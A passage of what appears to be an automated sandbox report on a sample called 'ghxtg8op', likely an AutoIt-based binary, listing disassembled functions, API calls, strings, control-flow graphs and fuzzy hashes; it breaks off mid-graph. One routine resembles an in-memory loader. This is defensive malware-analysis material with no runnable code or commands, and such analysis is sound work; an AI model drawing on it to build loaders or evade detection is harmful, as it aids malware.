                            • FindClose.KERNEL32(00000000), ref: 00DA448B
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FileFind$AttributesCloseFirst
                            • String ID:
                            • API String ID: 48322524-0
                            • Opcode ID: 1cce6cd0794ec7b62fbc5ce4a1f261683bb3db07a03cd213a704f9ddc89f415f
                            • Instruction ID: 2c08276d029c1c0dca761553a1483c6ca036c11247800549cdb3e38c1eaf0d42
                            • Opcode Fuzzy Hash: 1cce6cd0794ec7b62fbc5ce4a1f261683bb3db07a03cd213a704f9ddc89f415f
                            • Instruction Fuzzy Hash: 43E0D8324106026742106B38EC0D9E9B75DDE4A335F140715F835C11D0E7F4990095B5
                            Function 00D509D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                            Download Yara Rule
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D50A5B
                            • timeGetTime.WINMM ref: 00D50D16
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D50E53
                            • Sleep.KERNEL32(0000000A), ref: 00D50E61
                            • LockWindowUpdate.USER32(00000000), ref: 00D50EFA
                            • DestroyWindow.USER32 ref: 00D50F06
                            • GetMessageW.USER32 ref: 00D50F20
                            • Sleep.KERNEL32(0000000A,?,?), ref: 00D84E83
                            • TranslateMessage.USER32(?), ref: 00D85C60
                            • DispatchMessageW.USER32(?), ref: 00D85C6E
                            • GetMessageW.USER32 ref: 00D85C82
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb$pb$pb$pb
                            • API String ID: 4212290369-1420604165
                            • Opcode ID: 4947b7747c137806375d0591f0a6684668237799dbd0418b7504ffa21a37443c
                            • Instruction ID: dcb363eb771f53766e86034ab1b1e583d0f571d6332a68bc4c8fe3edbdafefa4
                            • Opcode Fuzzy Hash: 4947b7747c137806375d0591f0a6684668237799dbd0418b7504ffa21a37443c
                            • Instruction Fuzzy Hash: 0FB2A170604741DFDB24EF24C885BAABBE5FF85304F18491DE899972A1DB71E848CB72
                            Function 00DA9155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00DA8F5F: __time64.LIBCMT ref: 00DA8F69
                              • Part of subcall function 00D44EE5: _fseek.LIBCMT ref: 00D44EFD
                            • __wsplitpath.LIBCMT ref: 00DA9234
                              • Part of subcall function 00D640FB: __wsplitpath_helper.LIBCMT ref: 00D6413B
                            • _wcscpy.LIBCMT ref: 00DA9247
                            • _wcscat.LIBCMT ref: 00DA925A
                            • __wsplitpath.LIBCMT ref: 00DA927F
                            • _wcscat.LIBCMT ref: 00DA9295
                            • _wcscat.LIBCMT ref: 00DA92A8
                              • Part of subcall function 00DA8FA5: _memmove.LIBCMT ref: 00DA8FDE
                              • Part of subcall function 00DA8FA5: _memmove.LIBCMT ref: 00DA8FED
                            • _wcscmp.LIBCMT ref: 00DA91EF
                              • Part of subcall function 00DA9734: _wcscmp.LIBCMT ref: 00DA9824
                              • Part of subcall function 00DA9734: _wcscmp.LIBCMT ref: 00DA9837
                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00DA9452
                            • _wcsncpy.LIBCMT ref: 00DA94C5
                            • DeleteFileW.KERNEL32(?,?), ref: 00DA94FB
                            • CopyFileW.KERNEL32 ref: 00DA9511
                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DA9522
                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DA9534
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                            • String ID:
                            • API String ID: 1500180987-0
                            • Opcode ID: 992e86eb71440f9aecdc562604c1f31673e8a7faf618c08a8426826b37127e57
                            • Instruction ID: 7b5bb69cffb2a7af6c75fb9b0e343a4214fe9bbdacb2b05e7806ff554d971e8b
                            • Opcode Fuzzy Hash: 992e86eb71440f9aecdc562604c1f31673e8a7faf618c08a8426826b37127e57
                            • Instruction Fuzzy Hash: F1C129B1D00229ABDF21DFA5CC95ADEB7BDEF45310F0040AAF609E6151EB309A858F75
                            Function 00D4708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00D44706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E052F8,?,00D437AE,?), ref: 00D44724
                              • Part of subcall function 00D6050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00D47165), ref: 00D6052D
                            • RegOpenKeyExW.KERNEL32 ref: 00D471A8
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D7E8C8
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 00D7E909
                            • RegCloseKey.ADVAPI32(?), ref: 00D7E947
                            • _wcscat.LIBCMT ref: 00D7E9A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                            • API String ID: 2673923337-2727554177
                            • Opcode ID: f55e031e31ebf177617d9d2f9dc47d5d2491fd36cfbe75e02fc935922899305f
                            • Instruction ID: 60c9f46c297d8f371afb2f604919d1b0a98bfe3d1026ff9d61397526911720f0
                            • Opcode Fuzzy Hash: f55e031e31ebf177617d9d2f9dc47d5d2491fd36cfbe75e02fc935922899305f
                            • Instruction Fuzzy Hash: 207172715083019FC704EF26EC41AABBBE8FF88310B44492EF545971B1EB719998CB71
                            Function 00D43A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32 ref: 00D43A50
                            • LoadCursorW.USER32 ref: 00D43A5F
                            • LoadIconW.USER32 ref: 00D43A76
                            • LoadIconW.USER32 ref: 00D43A88
                            • LoadIconW.USER32 ref: 00D43A9A
                            • LoadImageW.USER32 ref: 00D43AC0
                            • RegisterClassExW.USER32(?), ref: 00D43B16
                              • Part of subcall function 00D43041: GetSysColorBrush.USER32 ref: 00D43074
                              • Part of subcall function 00D43041: RegisterClassExW.USER32(00000030), ref: 00D4309E
                              • Part of subcall function 00D43041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D430AF
                              • Part of subcall function 00D43041: InitCommonControlsEx.COMCTL32(?), ref: 00D430CC
                              • Part of subcall function 00D43041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D430DC
                              • Part of subcall function 00D43041: LoadIconW.USER32 ref: 00D430F2
                              • Part of subcall function 00D43041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D43101
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                            • String ID: #$0$AutoIt v3
                            • API String ID: 423443420-4155596026
                            • Opcode ID: 63af1e62e4b5de487008e4a62de8a3a3314405a00f334cbca9c0d83b6475e228
                            • Instruction ID: 525c219901ae6c75cf30178ea457061cd836592f6765240c618f93287ae1ac9e
                            • Opcode Fuzzy Hash: 63af1e62e4b5de487008e4a62de8a3a3314405a00f334cbca9c0d83b6475e228
                            • Instruction Fuzzy Hash: BA212A72900309AFEB11DFA5EC09B9E7FB1EB08711F100119F504B62B1D3B655988FA4
                            Function 00D43766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                            Download Yara Rule

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R
                            • API String ID: 1825951767-347772802
                            • Opcode ID: 9eec894646505af898bfe7168073373b1fc89f423f626b58971f1dccfbb71fe4
                            • Instruction ID: ae5fc9ed34c14ccb0c0e738a3dd9fbe3702e5ec45acc28b989ae6c6935aa6d39
                            • Opcode Fuzzy Hash: 9eec894646505af898bfe7168073373b1fc89f423f626b58971f1dccfbb71fe4
                            • Instruction Fuzzy Hash: C0A13872910219ABCF04EBA4DC95AEEB779FF15310F44052AF416B7192EF749A48CBB0
                            Function 00D43633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 883 d43633-d43681 885 d436e1-d436e3 883->885 886 d43683-d43686 883->886 885->886 889 d436e5 885->889 887 d436e7 886->887 888 d43688-d4368f 886->888 890 d436ed-d436f0 887->890 891 d7d0cc-d7d0fa call d51070 call d51093 887->891 892 d43695-d4369a 888->892 893 d4374b-d43753 PostQuitMessage 888->893 894 d436ca-d436d2 DefWindowProcW 889->894 895 d43715-d4373c SetTimer RegisterWindowMessageW 890->895 896 d436f2-d436f3 890->896 930 d7d0ff-d7d106 891->930 898 d7d154-d7d168 call da2527 892->898 899 d436a0-d436a2 892->899 900 d43711-d43713 893->900 901 d436d8-d436de 894->901 895->900 905 d4373e-d43749 CreatePopupMenu 895->905 902 d7d06f-d7d072 896->902 903 d436f9-d4370c KillTimer call d4443a call d43114 896->903 898->900 922 d7d16e 898->922 906 d43755-d43764 call d444a0 899->906 907 d436a8-d436ad 899->907 900->901 915 d7d074-d7d076 902->915 916 d7d0a8-d7d0c7 MoveWindow 902->916 903->900 905->900 906->900 911 d436b3-d436b8 907->911 912 d7d139-d7d140 907->912 920 d7d124-d7d134 call da2d36 911->920 921 d436be-d436c4 911->921 912->894 918 d7d146-d7d14f call d97c36 912->918 924 d7d097-d7d0a3 SetFocus 915->924 925 d7d078-d7d07b 915->925 916->900 918->894 920->900 921->894 921->930 922->894 924->900 925->921 926 d7d081-d7d092 call d51070 925->926 926->900 930->894 934 d7d10c-d7d11f call d4443a call d4434a 930->934 934->894
                            APIs
                            • DefWindowProcW.USER32(?,?,?,?), ref: 00D436D2
                            • KillTimer.USER32 ref: 00D436FC
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D4371F
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D4372A
                            • CreatePopupMenu.USER32 ref: 00D4373E
                            • PostQuitMessage.USER32(00000000), ref: 00D4374D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                            • String ID: TaskbarCreated
                            • API String ID: 129472671-2362178303
                            • Opcode ID: b0bfecb78e3df9b8a06ab1fb044fe6f94a675782e02a1c81022befc4c322347a
                            • Instruction ID: 9fc67cc320a0e81d6a42205206c492ac7745634da5593b8694b353e6b532630e
                            • Opcode Fuzzy Hash: b0bfecb78e3df9b8a06ab1fb044fe6f94a675782e02a1c81022befc4c322347a
                            • Instruction Fuzzy Hash: 874107B2200607EFDF146F6CDC0EBBA3666EB00340F584125F946A63E2DA619E949B71
                            Function 009940E8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 940 9940e8-994196 call 991b08 943 99419d-9941c3 call 994ff8 CreateFileW 940->943 946 9941ca-9941da 943->946 947 9941c5 943->947 955 9941dc 946->955 956 9941e1-9941fb VirtualAlloc 946->956 948 994315-994319 947->948 949 99435b-99435e 948->949 950 99431b-99431f 948->950 952 994361-994368 949->952 953 99432b-99432f 950->953 954 994321-994324 950->954 959 99436a-994375 952->959 960 9943bd-9943d2 952->960 961 99433f-994343 953->961 962 994331-99433b 953->962 954->953 955->948 957 9941fd 956->957 958 994202-994219 ReadFile 956->958 957->948 963 99421b 958->963 964 994220-994260 VirtualAlloc 958->964 965 994379-994385 959->965 966 994377 959->966 967 9943e2-9943ea 960->967 968 9943d4-9943df VirtualFree 960->968 969 994353 961->969 970 994345-99434f 961->970 962->961 963->948 971 994262 964->971 972 994267-994282 call 995248 964->972 973 994399-9943a5 965->973 974 994387-994397 965->974 966->960 968->967 969->949 970->969 971->948 980 99428d-994297 972->980 977 9943b2-9943b8 973->977 978 9943a7-9943b0 973->978 976 9943bb 974->976 976->952 977->976 978->976 981 994299-9942c8 call 995248 980->981 982 9942ca-9942de call 995058 980->982 981->980 987 9942e0 982->987 988 9942e2-9942e6 982->988 987->948 990 9942e8-9942ec CloseHandle 988->990 991 9942f2-9942f6 988->991 990->991 992 9942f8-994303 VirtualFree 991->992 993 994306-99430f 991->993 992->993 993->943 993->948
                            APIs
                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 009941B9
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009943DF
                            Memory Dump Source
                            • Source File: 00000005.00000002.486369482.0000000000991000.00000040.00000020.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_991000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateFileFreeVirtual
                            • String ID:
                            • API String ID: 204039940-0
                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                            • Instruction ID: bc7c4de97dfbc4766a9c251b37f243d7e04a6864eb701245eac88faabc8e1dca
                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                            • Instruction Fuzzy Hash: 1FA11774E00209EBDF15CFA8C985FEEB7B5BF48305F208559E615BB280D7799A81CB90
                            Function 00D4F76F Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00D60162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D60193
                              • Part of subcall function 00D60162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D6019B
                              • Part of subcall function 00D60162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D601A6
                              • Part of subcall function 00D60162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D601B1
                              • Part of subcall function 00D60162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D601B9
                              • Part of subcall function 00D60162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D601C1
                              • Part of subcall function 00D560F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00D4F930), ref: 00D56154
                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D4F9CD
                            • OleInitialize.OLE32(00000000), ref: 00D4FA4A
                            • CloseHandle.KERNEL32(00000000), ref: 00D845C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                            • String ID: <W$\T$S
                            • API String ID: 1986988660-80204951
                            • Opcode ID: fe83b25942b4cebba031d843173126d31e6f1b25aa9552398dff5e1f844ba958
                            • Instruction ID: 3b40b4f7f771125dc155a312cac9f2276cb33e3936b4ab01eab1e65d8e81c142
                            • Opcode Fuzzy Hash: fe83b25942b4cebba031d843173126d31e6f1b25aa9552398dff5e1f844ba958
                            • Instruction Fuzzy Hash: E281D1B2801B40CFC784DF6AAC4569B7BE5FB98306754912AD42AE7361E77648CC8F21
                            Function 00D439D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1112 d439d5-d43a45 CreateWindowExW * 2 ShowWindow * 2
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$CreateShow
                            • String ID: AutoIt v3$edit
                            • API String ID: 1584632944-3779509399
                            • Opcode ID: b53b1c3685c0d73f921edd50ec82828c1761eb0fb6f93b6c3b8982cc1cd407b5
                            • Instruction ID: 14b46fc2f2b26b26be92a1e32c5a18218ca730e4461bcb4107dec8a06797a290
                            • Opcode Fuzzy Hash: b53b1c3685c0d73f921edd50ec82828c1761eb0fb6f93b6c3b8982cc1cd407b5
                            • Instruction Fuzzy Hash: F2F0DA72541695BFEA3157276C4DF6B2E7EDBC6F50B00412EB904F22B0C6721895DEB0
                            Function 00993EB8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1113 993eb8-993fe0 call 991b08 call 993da8 CreateFileW 1120 993fe2 1113->1120 1121 993fe7-993ff7 1113->1121 1122 994097-99409c 1120->1122 1124 993ff9 1121->1124 1125 993ffe-994018 VirtualAlloc 1121->1125 1124->1122 1126 99401a 1125->1126 1127 99401c-994033 ReadFile 1125->1127 1126->1122 1128 994035 1127->1128 1129 994037-994071 call 993de8 call 992da8 1127->1129 1128->1122 1134 99408d-994095 ExitProcess 1129->1134 1135 994073-994088 call 993e38 1129->1135 1134->1122 1135->1134
                            APIs
                              • Part of subcall function 00993DA8: Sleep.KERNELBASE(000001F4), ref: 00993DB9
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00993FD6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486369482.0000000000991000.00000040.00000020.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_991000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateFileSleep
                            • String ID: K07L25CJ2DRME
                            • API String ID: 2694422964-835341977
                            • Opcode ID: ad437d35e296375cba8f4e0f471cbaf24887b03f33d6e9a8143bde40257624d7
                            • Instruction ID: 1c32745ca408c755a9a1782df8626c5a0054baff834a4271c5f48407edb29c9b
                            • Opcode Fuzzy Hash: ad437d35e296375cba8f4e0f471cbaf24887b03f33d6e9a8143bde40257624d7
                            • Instruction Fuzzy Hash: F1519171D04249EBEF21DBB8C855BEEBB79AF59300F004599E609BB2C0D7790B05CBA5
                            Function 00D4407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1137 d4407c-d44092 1138 d4416f-d44173 1137->1138 1139 d44098-d440ad call d47a16 1137->1139 1142 d440b3-d440d3 call d47bcc 1139->1142 1143 d7d3c8-d7d3d7 LoadStringW 1139->1143 1146 d7d3e2-d7d3fa call d47b2e call d46fe3 1142->1146 1147 d440d9-d440dd 1142->1147 1143->1146 1156 d440ed-d4416a call d62de0 call d4454e call d62dbc Shell_NotifyIconW call d45904 1146->1156 1159 d7d400-d7d41e call d47cab call d46fe3 call d47cab 1146->1159 1149 d44174-d4417d call d48047 1147->1149 1150 d440e3-d440e8 call d47b2e 1147->1150 1149->1156 1150->1156 1156->1138 1159->1156
                            APIs
                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D7D3D7
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            • _memset.LIBCMT ref: 00D440FC
                            • _wcscpy.LIBCMT ref: 00D44150
                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D44160
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                            • String ID: Line:
                            • API String ID: 3942752672-1585850449
                            • Opcode ID: 924b73db2694998b13a8c64c27e05b49fea7e085208deae81377ee7f68370dc7
                            • Instruction ID: d342d3014c6b7e8e4a93ed3e92a4b21cf6ceef70fcf7e4e0f94a842c1e33b8af
                            • Opcode Fuzzy Hash: 924b73db2694998b13a8c64c27e05b49fea7e085208deae81377ee7f68370dc7
                            • Instruction Fuzzy Hash: 8731A172008705AFD721EB60DC46FEB77E8EF44310F14451EF589A21A1EB709688CBB2
                            Function 00D6541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1172 d6541d-d65436 1173 d65453 1172->1173 1174 d65438-d6543d 1172->1174 1176 d65455-d6545b 1173->1176 1174->1173 1175 d6543f-d65441 1174->1175 1177 d65443-d65448 call d68b28 1175->1177 1178 d6545c-d65461 1175->1178 1188 d6544e call d68db6 1177->1188 1180 d65463-d6546d 1178->1180 1181 d6546f-d65473 1178->1181 1180->1181 1183 d65493-d654a2 1180->1183 1184 d65475-d65480 call d62de0 1181->1184 1185 d65483-d65485 1181->1185 1186 d654a4-d654a7 1183->1186 1187 d654a9 1183->1187 1184->1185 1185->1177 1190 d65487-d65491 1185->1190 1191 d654ae-d654b3 1186->1191 1187->1191 1188->1173 1190->1177 1190->1183 1194 d6559c-d6559f 1191->1194 1195 d654b9-d654c0 1191->1195 1194->1176 1196 d654c2-d654ca 1195->1196 1197 d65501-d65503 1195->1197 1196->1197 1198 d654cc 1196->1198 1199 d65505-d65507 1197->1199 1200 d6556d-d6556e call d70ba7 1197->1200 1201 d654d2-d654d4 1198->1201 1202 d655ca 1198->1202 1203 d6552b-d65536 1199->1203 1204 d65509-d65511 1199->1204 1208 d65573-d65577 1200->1208 1211 d654d6-d654d8 1201->1211 1212 d654db-d654e0 1201->1212 1213 d655ce-d655d7 1202->1213 1209 d6553a-d6553d 1203->1209 1210 d65538 1203->1210 1206 d65513-d6551f 1204->1206 1207 d65521-d65525 1204->1207 1214 